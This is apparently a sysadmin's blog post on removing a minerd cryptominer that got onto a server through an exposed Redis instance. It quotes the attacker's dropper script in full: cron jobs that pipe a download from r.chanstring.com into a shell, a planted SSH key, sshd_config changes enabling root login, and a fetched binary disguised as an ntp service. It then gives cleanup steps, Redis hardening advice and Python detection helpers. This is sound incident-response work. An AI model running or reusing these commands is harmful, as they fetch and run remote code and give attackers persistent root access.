Reference Link: http://www.cnblogs.com/zhouto/p/5680594.html
The minerd miner got onto this machine through a Redis vulnerability;
Redis security: http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/
Running top on the server showed a minerd process using more than 90% of the CPU;
ps aux | grep minerd # killed the process directly, but it was back within about ten seconds; after several attempts it still could not be kept dead!
Tracing the cause: the scheduled tasks (crontab -l) contained an entry that fetched a script from the network and executed it;
Copying the link from that scheduled task lets you download the script; its contents are as follows:
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh" > /var/spool/cron/crontabs/root
if [ ! -f "/root/.ssh/KHK75NEOiq" ]; then
mkdir -p ~/.ssh
rm -f ~/.ssh/authorized_keys*
echo "ssh-rsa aaaab3nzac1yc2eaaaadaqabaaabaqczwg/9udowkwwr1zhxb3mtn++94rnitshrewoc9hzfs/f/yw8kghytkviak/ ag1xbkbcbdhxwb/tdrzmzf6p+d+ohv4u9nyoyplj53mzb1jpqvj+wz7yeoww/qpjeoxlkn40y5hflu/xre4dybhqv8q/z/sdcvht5fifn+ tkez3txl6nqhtz405pd3glwfsj1a/kv9rojf6wl4l3wcrdxu+dm8gspjtuuxxu74iseyjc4b0h1bwdqbbxmvqzlxzzr6k9azpom+ Ulhzdzqra3sx1y993qhnytbegn+9izcwlhonlepxbro4mxqktvdqkwo0l4ar7xblady7vrnrvfav root" > ~/.ssh/KHK75NEOiq
echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
/etc/init.d/sshd restart
fi
if [ ! -f "/etc/init.d/ntp" ]; then
if [ ! -f "/etc/systemd/system/ntp.service" ]; then
mkdir -p /opt
curl -fsSL http://r.chanstring.com/v51/lady_$(uname -m) -o /opt/KHK75NEOiq33 && chmod +x /opt/KHK75NEOiq33 && /opt/KHK75NEOiq33 -install
fi
fi
/etc/init.d/ntp start
ps auxf | grep -v grep | grep "/usr/bin/cron" | awk '{print $2}' | xargs kill -9
ps auxf | grep -v grep | grep "/opt/cron" | awk '{print $2}' | xargs kill -9
Ran crontab -r to clear the scheduled tasks and restarted the crond service; # this still did not help: the process was killed, restarted on its own, and CPU usage climbed again; kept looking for the cause
Working from the script:
1. chmod -x minerd # first remove the execute permission from the binary; do not delete it yet, otherwise it is regenerated automatically;
2. Kill the minerd process;
3. Delete khk75neoiq33 and the minerd file in the same directory;
4. Delete the /var/spool/cron/root and /var/spool/cron/crontabs/root cron files;
5. Remove the lines the script appended to the main sshd configuration file:
echo "PermitRootLogin yes" >> /etc/ssh/sshd_config
echo "RSAAuthentication yes" >> /etc/ssh/sshd_config
echo "PubkeyAuthentication yes" >> /etc/ssh/sshd_config
echo "AuthorizedKeysFile .ssh/KHK75NEOiq" >> /etc/ssh/sshd_config
After removing them, restart the sshd service;
6. Delete ~/.ssh/khk75neoiq;
7. Later, checking /etc/init.d/, an ntp service turned up there: the Trojan had registered an "ntp" service set to start at boot; this ntp is not the startup script of a time server;
/etc/init.d/ntp stop # stop the service and set it not to start;
chkconfig ntp off # remove it from boot-time autostart;
When that is done, delete the ntp files;
8. Delete the minerd files
After that, watching the machine, minerd no longer restarted and CPU usage returned to normal!
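The cleanup steps above amount to a checklist of indicators the dropper script leaves behind: a crontab entry that pipes a download into a shell, four directives appended to sshd_config, a key file with an unusual name, a fake ntp init script and the miner binary itself. The following triage helper, added here as an illustration and not part of the original post, turns that checklist into code. It works on constructed sample text modelled on the script quoted above rather than on a live host, so it can be reviewed offline; the file paths and the sample crontab and sshd_config contents are assumptions made for the example.

```python
import re

# Constructed sample inputs modelled on the dropper script quoted in the
# write-up; they are not captured from a real host.
SAMPLE_CRONTAB = (
    "0 3 * * * /usr/bin/logrotate /etc/logrotate.conf\n"
    "*/10 * * * * curl -fsSL http://r.chanstring.com/pm.sh?0706 | sh\n"
)
SAMPLE_SSHD_CONFIG = (
    "Port 22\n"
    "#PermitRootLogin prohibit-password\n"
    "ChallengeResponseAuthentication no\n"
    "PermitRootLogin yes\n"
    "RSAAuthentication yes\n"
    "PubkeyAuthentication yes\n"
    "AuthorizedKeysFile .ssh/KHK75NEOiq\n"
)

# A scheduled task that downloads something and pipes it straight into a shell.
CRON_DOWNLOAD_EXEC = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b", re.I)

# The exact directives the dropper appends to sshd_config (normalised to
# lowercase, single spaces).
INJECTED_DIRECTIVES = {
    "permitrootlogin yes",
    "rsaauthentication yes",
    "pubkeyauthentication yes",
    "authorizedkeysfile .ssh/khk75neoiq",
}

# Filesystem artefacts named in the write-up. /etc/init.d/ntp is only an
# indicator because this host had no real time daemon installed.
KNOWN_ARTIFACT_PATTERNS = [
    re.compile(r"/khk75neoiq", re.I),        # dropped key file and miner binary
    re.compile(r"(^|/)minerd$"),
    re.compile(r"^/var/spool/cron(/crontabs)?/root$"),
    re.compile(r"^/etc/init\.d/ntp$"),
    re.compile(r"^/etc/systemd/system/ntp\.service$"),
]


def find_cron_droppers(crontab_text):
    """Return the crontab lines that pipe a downloaded payload into a shell."""
    return [line for line in crontab_text.splitlines()
            if CRON_DOWNLOAD_EXEC.search(line)]


def is_injected_sshd_line(line):
    """True for an active directive the dropper is known to append."""
    norm = " ".join(line.split()).lower()
    if not norm or norm.startswith("#"):
        return False
    if norm in INJECTED_DIRECTIVES:
        return True
    # Any AuthorizedKeysFile that no longer names the standard file is suspect.
    return norm.startswith("authorizedkeysfile ") and ".ssh/authorized_keys" not in norm


def audit_sshd_config(config_text):
    """Return (flagged_lines, cleaned_text): the injected directives and the
    config with those lines removed (step 5 of the cleanup)."""
    flagged, kept = [], []
    for line in config_text.splitlines():
        (flagged if is_injected_sshd_line(line) else kept).append(line)
    return flagged, "\n".join(kept) + "\n"


def classify_artifacts(paths):
    """Return the paths that match a known artefact of this dropper."""
    return [p for p in paths
            if any(pat.search(p) for pat in KNOWN_ARTIFACT_PATTERNS)]


if __name__ == "__main__":
    print("cron droppers:", find_cron_droppers(SAMPLE_CRONTAB))
    flagged, cleaned = audit_sshd_config(SAMPLE_SSHD_CONFIG)
    print("injected sshd lines:", flagged)
    print("cleaned sshd_config:\n" + cleaned)
    print("artefacts:", classify_artifacts(
        ["/opt/KHK75NEOiq33", "/root/.ssh/KHK75NEOiq", "/etc/init.d/ntp",
         "/usr/bin/ntpd", "/opt/minerd", "/etc/cron.d/backup"]))
```

The functions only report and produce a cleaned configuration; the order of the destructive steps (remove the execute bit before killing, delete the cron files and the init script before the binary) is what the write-up found necessary, and is best run by hand once the output has been reviewed.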
Removing minerd is not the real goal; the main thing is to find the root cause. On my server the problem was the Redis service: the attacker used a Redis vulnerability to gain access to the server,
see: http://blog.jobbole.com/94518/
and then planted the malware;
Here are the fixes and the cleanup work:
1. Close the Redis back door:
Configure the bind option to restrict which IPs may connect to the Redis server, and change the default Redis port 6379.
Configure auth and set a password; note that the password is stored in plaintext in the Redis configuration file.
Configure rename-command CONFIG "RENAME_CONFIG" so that even with unauthorized access, it is harder for an attacker to use the CONFIG command.
The good news is that the Redis author has said a "real user" system will be developed to separate normal users from admin privileges, with ordinary users barred from running certain commands such as CONFIG.
2. Open ~/.ssh/authorized_keys and the known_hosts file and delete any entries you do not recognize.
3. Check the user list for accounts you did not add; if there are any, delete them.
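Step 1 above lists four changes to redis.conf. The script below, added as an example and not taken from the original post or from Redis itself, audits a configuration for those four points and rewrites it with the hardened values; the redis.conf excerpt, the replacement port and the password are constructed for the example. It goes a little beyond the text by also treating an explicit bind to 0.0.0.0, * or :: as equivalent to no bind at all.

```python
# Constructed redis.conf excerpt showing the weak state the write-up describes:
# no bind restriction, default port, no password, CONFIG callable by name.
WEAK_REDIS_CONF = (
    "# bind 127.0.0.1\n"
    "port 6379\n"
    "# requirepass foobared\n"
    "daemonize yes\n"
    "dir /var/lib/redis\n"
)

# Directives the hardening step rewrites; everything else is passed through.
MANAGED = ("bind", "port", "requirepass", "rename-command")


def parse_redis_conf(text):
    """Map each active (uncommented) directive to the list of its argument strings."""
    conf = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        name, _, args = line.partition(" ")
        conf.setdefault(name.lower(), []).append(args.strip())
    return conf


def audit_redis_conf(text):
    """Return a list of findings; empty when all four recommendations are met."""
    conf = parse_redis_conf(text)
    findings = []
    binds = [a for args in conf.get("bind", []) for a in args.split()]
    if not binds or any(a in ("0.0.0.0", "*", "::") for a in binds):
        findings.append("bind: Redis accepts connections on every interface")
    if conf.get("port", ["6379"])[-1] == "6379":
        findings.append("port: default 6379 is still in use")
    if not conf.get("requirepass"):
        findings.append("requirepass: no AUTH password set")
    renamed = any([a.upper() for a in args.split()[:1]] == ["CONFIG"]
                  for args in conf.get("rename-command", []))
    if not renamed:
        findings.append("rename-command: CONFIG still reachable under its default name")
    return findings


def harden_redis_conf(text, password, bind="127.0.0.1", port=16379,
                      config_alias="RENAME_CONFIG"):
    """Return the config with the managed directives replaced by hardened values.

    The password is written in clear text, exactly as the write-up warns, so
    the file's ownership and permissions matter as much as its contents.
    """
    kept = []
    for raw in text.splitlines():
        line = raw.strip()
        name = line.partition(" ")[0].lower()
        if line and not line.startswith("#") and name in MANAGED:
            continue  # drop the weak active setting; the hardened one is appended
        kept.append(raw)
    kept += [
        f"bind {bind}",
        f"port {port}",
        f"requirepass {password}",
        f'rename-command CONFIG "{config_alias}"',
    ]
    return "\n".join(kept) + "\n"


if __name__ == "__main__":
    for finding in audit_redis_conf(WEAK_REDIS_CONF):
        print("weak:", finding)
    hardened = harden_redis_conf(WEAK_REDIS_CONF, "constructed-example-password")
    print(hardened)
    print("findings after hardening:", audit_redis_conf(hardened))
```

Because a commented-out directive is ignored, the audit treats "# bind 127.0.0.1" as no bind at all, which is the default state of a stock redis.conf and exactly what let the instance be reached from outside.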
Careful analysis of this script is what made it possible to clean up this minerd mining incident, but the fundamental fix is to secure Redis properly!
This article is from the "11009859" blog; please keep this source: http://11019859.blog.51cto.com/11009859/1850771
Redis backdoor leads to mining minerd solution